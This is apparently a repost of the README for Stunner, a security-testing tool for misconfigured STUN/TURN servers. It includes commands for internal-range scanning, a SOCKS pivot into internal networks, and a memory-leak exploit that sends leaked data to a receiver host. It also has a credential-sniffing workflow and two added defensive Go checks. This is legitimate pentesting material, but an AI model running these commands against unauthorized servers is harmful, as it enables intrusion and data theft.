Sunday, May 29, 2022

Tool To Test And Exploit STUN, TURN And TURN Over TCP Servers

Stunner is a tool to test and exploit STUN, TURN and TURN over TCP servers. TURN is a protocol mostly used in videoconferencing and audio chats (WebRTC).

If you find a misconfigured server you can use this tool to open a local SOCKS proxy that relays all traffic via the TURN protocol into the internal network behind the server.

I developed this tool during a test of Cisco Expressway which resulted in some vulnerabilities: https://firefart.at/post/multiple_vulnerabilities_cisco_expressway/

To get the required username and password you need to fetch them using an out-of-band method, like sniffing the Connect request from a web browser with Burp. I added an example workflow at the bottom of the readme on how you would test such a server.

This work is licensed under the Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License. To view a copy of this license, visit http://creativecommons.org/licenses/by-nc-sa/4.0/ or send a letter to Creative Commons, PO Box 1866, Mountain View, CA 94042, USA.

STUN: RFC 5389

TURN: RFC 5766

TURN for TCP: RFC 6062

TURN Extension for IPv6: RFC 6156

info

This command will print some information about the STUN or TURN server, like the supported protocols and attributes such as the software in use.

Options

--debug, -d                   enable debug output (default: false)
--turnserver value, -s value  turn server to connect to in the format host:port
--tls                         Use TLS for connecting (false in most tests) (default: false)
--timeout value               connect timeout to turn server (default: 1s)
--help, -h                    show help (default: false)

Example

./stunner info -s x.x.x.x:443

range-scan

This command tries several private and restricted ranges to see if the TURN server is configured to allow connections to those IP addresses. If a specific range isn't prohibited you can enumerate it further with the other provided commands. If an IP is reachable it means the TURN server will forward traffic to this IP.
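The check a correctly configured TURN relay applies before forwarding to a peer, as an added Go example that is not part of Stunner: the relay refuses private and restricted destinations, which is exactly what range-scan probes for. The list of ranges is my assumption, since the page does not enumerate the ones the scan tries.

```go
package main

import (
	"fmt"
	"net"
)

// restrictedPeerRanges: loopback, RFC 1918, link-local, CGNAT, unspecified,
// and their IPv6 equivalents (assumed list; the page does not enumerate them).
var restrictedPeerRanges = mustParseCIDRs(
	"127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
	"169.254.0.0/16", "100.64.0.0/10", "0.0.0.0/8",
	"::1/128", "fc00::/7", "fe80::/10", "::/128",
)

func mustParseCIDRs(cidrs ...string) []*net.IPNet {
	nets := make([]*net.IPNet, 0, len(cidrs))
	for _, c := range cidrs {
		_, n, err := net.ParseCIDR(c)
		if err != nil {
			panic(err)
		}
		nets = append(nets, n)
	}
	return nets
}

// PeerAllowed reports whether the relay may forward to peer. Unparseable
// input fails closed, and IPv4-mapped IPv6 (::ffff:10.0.0.1) is checked as
// IPv4 so the mapping cannot be used to slip past the IPv4 rules.
func PeerAllowed(peer string) bool {
	ip := net.ParseIP(peer)
	if ip == nil {
		return false
	}
	if v4 := ip.To4(); v4 != nil {
		ip = v4
	}
	for _, n := range restrictedPeerRanges {
		if n.Contains(ip) {
			return false
		}
	}
	return true
}

func main() {
	for _, p := range []string{"127.0.0.1", "10.1.2.3", "::ffff:192.168.0.1", "fe80::1", "203.0.113.7"} {
		fmt.Printf("%-20s relay allowed: %v\n", p, PeerAllowed(p))
	}
}
```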

Options

--debug, -d                   enable debug output (default: false)
--turnserver value, -s value  turn server to connect to in the format host:port
--tls                         Use TLS for connecting (false in most tests) (default: false)
--protocol value              protocol to use when connecting to the TURN server. Supported values: tcp and udp (default: "udp")
--timeout value               connect timeout to turn server (default: 1s)
--username value, -u value    username for the turn server
--password value, -p value    password for the turn server
--help, -h                    show help (default: false)

Example

TCP based TURN connection (connection from you to the TURN server):

./stunner range-scan -s x.x.x.x:3478 -u username -p password --protocol tcp

UDP based TURN connection (connection from you to the TURN server):

./stunner range-scan -s x.x.x.x:3478 -u username -p password --protocol udp

socks

This is one of the most useful commands for TURN servers that support TCP connections to backend servers. It will launch a local socks5 server with no authentication and will relay all TCP traffic over the TURN protocol (UDP via SOCKS is currently not supported). If the server is misconfigured it will forward the traffic to internal addresses, so this can be used to reach internal systems and abuse the server as a proxy into the internal network. If you choose to also do DNS lookups over socks, they will be resolved using your local nameserver, so it's best to work with private IPv4 and IPv6 addresses. Please be aware that this module can only relay TCP traffic.

Options

--debug, -d                   enable debug output (default: false)
--turnserver value, -s value  turn server to connect to in the format host:port
--tls                         Use TLS for connecting (false in most tests) (default: false)
--protocol value              protocol to use when connecting to the TURN server. Supported values: tcp and udp (default: "udp")
--timeout value               connect timeout to turn server (default: 1s)
--username value, -u value    username for the turn server
--password value, -p value    password for the turn server
--listen value, -l value      Address and port to listen on (default: "127.0.0.1:1080")
--drop-public, -x             Drop requests to public IPs. This is useful if the target can't connect to the internet and your browser needs to check TLS certificates via the connection. (default: true)
--help, -h                    show help (default: false)

Example

./stunner socks -s x.x.x.x:3478 -u username -p password -x

After starting the proxy open your browser, point the proxy in your settings to socks5 with an IP of 127.0.0.1:1080 (be sure not to set the "bypass local addresses" option, as we want to reach the remote local addresses) and call the IP of your choice in the browser.

Example: https://127.0.0.1, https://127.0.0.1:8443 or https://[::1]:8443 (these will call the ports on the tested TURN server from its local interfaces).

You can also configure proxychains to use this proxy (but it will be very slow, as each request results in multiple requests to enable the proxying). Just edit /etc/proxychains.conf and enter the value socks5 127.0.0.1 1080 under ProxyList.

Example of nmap over this socks5 proxy with a correctly configured proxychains (note the -sT, which does full TCP connects; a raw SYN scan would not go through the socks5 proxy):

sudo proxychains nmap -sT -p 80,443,8443 -sV 127.0.0.1

brute-transports

This will most likely yield no usable information but can be useful to enumerate all available transports (= protocols to internal systems) supported by the server. This might show some custom protocol implementations but will mostly return only the defaults.

Options

--debug, -d                   enable debug output (default: false)
--turnserver value, -s value  turn server to connect to in the format host:port
--tls                         Use TLS for connecting (false in most tests) (default: false)
--protocol value              protocol to use when connecting to the TURN server. Supported values: tcp and udp (default: "udp")
--timeout value               connect timeout to turn server (default: 1s)
--username value, -u value    username for the turn server
--password value, -p value    password for the turn server
--help, -h                    show help (default: false)

Example

./stunner brute-transports -s x.x.x.x:3478 -u username -p password

memoryleak

This attack works the following way: the server takes the data to send to the target (which must be a high port > 1024 most of the time) as a TLV (Type Length Value). This exploit uses a big length with a short value. If the server does not check the boundaries of the TLV, it may send memory beyond the value, up to the declared length, to the target. Cisco Expressway was confirmed vulnerable to this, but according to Cisco it only leaked memory of the current session.
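The boundary check the memoryleak test exercises, as an added Go example that is not Stunner's or Cisco's code: a STUN attribute parser that validates each TLV Length against the bytes actually present before slicing the value, so a DATA attribute declaring 35510 bytes with a two-byte body is rejected instead of being read past the buffer. The sample message is constructed here.

```go
package main

import (
	"encoding/binary"
	"fmt"
)

const stunHeaderLen = 20 // type(2) length(2) magic cookie(4) transaction id(12)
type Attribute struct { // one decoded STUN TLV (RFC 5389 section 15)
	Type  uint16
	Value []byte
}

// ParseAttributes decodes the TLVs following the STUN header. Each Length is
// checked against the bytes actually present before the value is sliced, and
// the 4-byte value padding is honoured when advancing to the next attribute.
func ParseAttributes(msg []byte) ([]Attribute, error) {
	if len(msg) < stunHeaderLen {
		return nil, fmt.Errorf("message shorter than STUN header")
	}
	// The header's Length must not claim more body than was received either.
	bodyLen := int(binary.BigEndian.Uint16(msg[2:4]))
	if bodyLen > len(msg)-stunHeaderLen {
		return nil, fmt.Errorf("header declares %d body bytes, %d present", bodyLen, len(msg)-stunHeaderLen)
	}
	body := msg[stunHeaderLen : stunHeaderLen+bodyLen]
	var attrs []Attribute
	for off := 0; off < len(body); {
		if len(body)-off < 4 {
			return nil, fmt.Errorf("truncated attribute header at offset %d", off)
		}
		typ := binary.BigEndian.Uint16(body[off:])
		ln := int(binary.BigEndian.Uint16(body[off+2:]))
		if ln > len(body)-off-4 { // the bound a vulnerable server skips
			return nil, fmt.Errorf("attr 0x%04x declares %d bytes, %d present", typ, ln, len(body)-off-4)
		}
		attrs = append(attrs, Attribute{Type: typ, Value: body[off+4 : off+4+ln]})
		off += 4 + (ln+3)&^3 // skip value plus padding to a 4-byte boundary
	}
	return attrs, nil
}

func main() {
	// Constructed Send indication: XOR-PEER-ADDRESS, then DATA claiming 35510 bytes (the default --size) with only "hi" present.
	msg := []byte{0x00, 0x16, 0x00, 0x14, 0x21, 0x12, 0xa4, 0x42, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
		0x00, 0x12, 0x00, 0x08, 0, 1, 0x0d, 0x96, 0x3b, 0x1c, 0x3a, 0xef, 0x00, 0x13, 0x8a, 0xb6, 'h', 'i', 0, 0}
	_, err := ParseAttributes(msg)
	fmt.Println("oversized DATA rejected:", err) // a non-checking parser would read past the buffer here
}
```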

Options

--debug, -d                   enable debug output (default: false)
--turnserver value, -s value  turn server to connect to in the format host:port
--tls                         Use TLS for connecting (false in most tests) (default: false)
--protocol value              protocol to use when connecting to the TURN server. Supported values: tcp and udp (default: "udp")
--timeout value               connect timeout to turn server (default: 1s)
--username value, -u value    username for the turn server
--password value, -p value    password for the turn server
--target value, -t value      Target to leak memory to in the form host:port. Should be a public server under your control
--size value                  Size of the buffer to leak (default: 35510)
--help, -h                    show help (default: false)

Example

To receive the data we need to set up a receiver on a server with a public IP. Normally firewalls are configured to only allow high ports (>1024) from TURN servers, so be sure to use a high port like 8080 in this example when connecting out to the internet.

Then execute the following statement on your machine, adding the public IP of your receiver to the -t parameter (y.y.y.y is a placeholder):

./stunner memoryleak -s x.x.x.x:3478 -u username -p password -t y.y.y.y:8080

If it works you should see big loads of memory coming in, otherwise you'll only see short messages.

udp-scanner

If a TURN server allows UDP connections to targets, this scanner can be used to scan all private IP ranges and send them SNMP and DNS requests. As this checks a lot of IPs it can take several days to complete, so use with caution or specify smaller targets via the parameters. You need to supply an SNMP community string that will be tried and a domain name that will be resolved on each IP. For the domain name you can for example use Burp Collaborator.

Options

--debug, -d                   enable debug output (default: false)
--turnserver value, -s value  turn server to connect to in the format host:port
--tls                         Use TLS for connecting (false in most tests) (default: false)
--protocol value              protocol to use when connecting to the TURN server. Supported values: tcp and udp (default: "udp")
--timeout value               connect timeout to turn server (default: 1s)
--username value, -u value    username for the turn server
--password value, -p value    password for the turn server
--community-string value      SNMP community string to use for scanning (default: "public")
--domain value                domain name to resolve on internal DNS servers during scanning
--ip value                    Scan single IP instead of whole private range. If left empty all private ranges are scanned. Accepts single IPs or CIDR format.  (accepts multiple inputs)
--help, -h                    show help (default: false)

Example

./stunner udp-scanner -s x.x.x.x:3478 -u username -p password --community-string public --domain <your-collaborator-domain>

tcp-scanner

Same as udp-scanner, but sends out HTTP requests to the specified ports (HTTPS is not supported).

Options

--debug, -d                   enable debug output (default: false)
--turnserver value, -s value  turn server to connect to in the format host:port
--tls                         Use TLS for connecting (false in most tests) (default: false)
--protocol value              protocol to use when connecting to the TURN server. Supported values: tcp and udp (default: "udp")
--timeout value               connect timeout to turn server (default: 1s)
--username value, -u value    username for the turn server
--password value, -p value    password for the turn server
--ports value                 Ports to check (default: "80,443,8080,8081")
--ip value                    Scan single IP instead of whole private range. If left empty all private ranges are scanned. Accepts single IPs or CIDR format.  (accepts multiple inputs)
--help, -h                    show help (default: false)

Example

./stunner tcp-scanner -s x.x.x.x:3478 -u username -p password --ports 80,443,8080,8081

Example workflow

Say you find a service using WebRTC and want to test it.

The first step is to get the required data. I suggest launching Wireshark in the background and simply joining a meeting via Burp to collect all HTTP and WebSocket traffic. Next, search your Burp history for keywords related to TURN like 3478, password, credential and username (be sure to also check the WebSockets tab for these keywords). This might reveal the TURN server and the protocol (UDP and TCP endpoints might have different ports) and the credentials used to connect. If you can't find the data in Burp, start looking at Wireshark to identify the traffic. If it's on a non-standard port (anything other than 3478), decode the protocol as STUN in Wireshark (right click, Decode As). This should show you the username used to connect, and you can use this information to search Burp's history even further for the required data. Please note that Wireshark can't show you the password, as the password is used to hash some packet contents and so can't be reversed.

The next step is to issue the info command to the TURN server using the correct port and protocol obtained from Burp.

If this works, the next step is a range-scan. If this allows any traffic to internal systems you can exploit this further, but be aware that UDP has only limited use cases.

If TCP connections to internal systems are allowed, simply launch the socks command, set the socks proxy in your browser to 127.0.0.1:1080 and access the allowed IPs via the browser. You can try 127.0.0.1:443 and other IPs to find management interfaces.


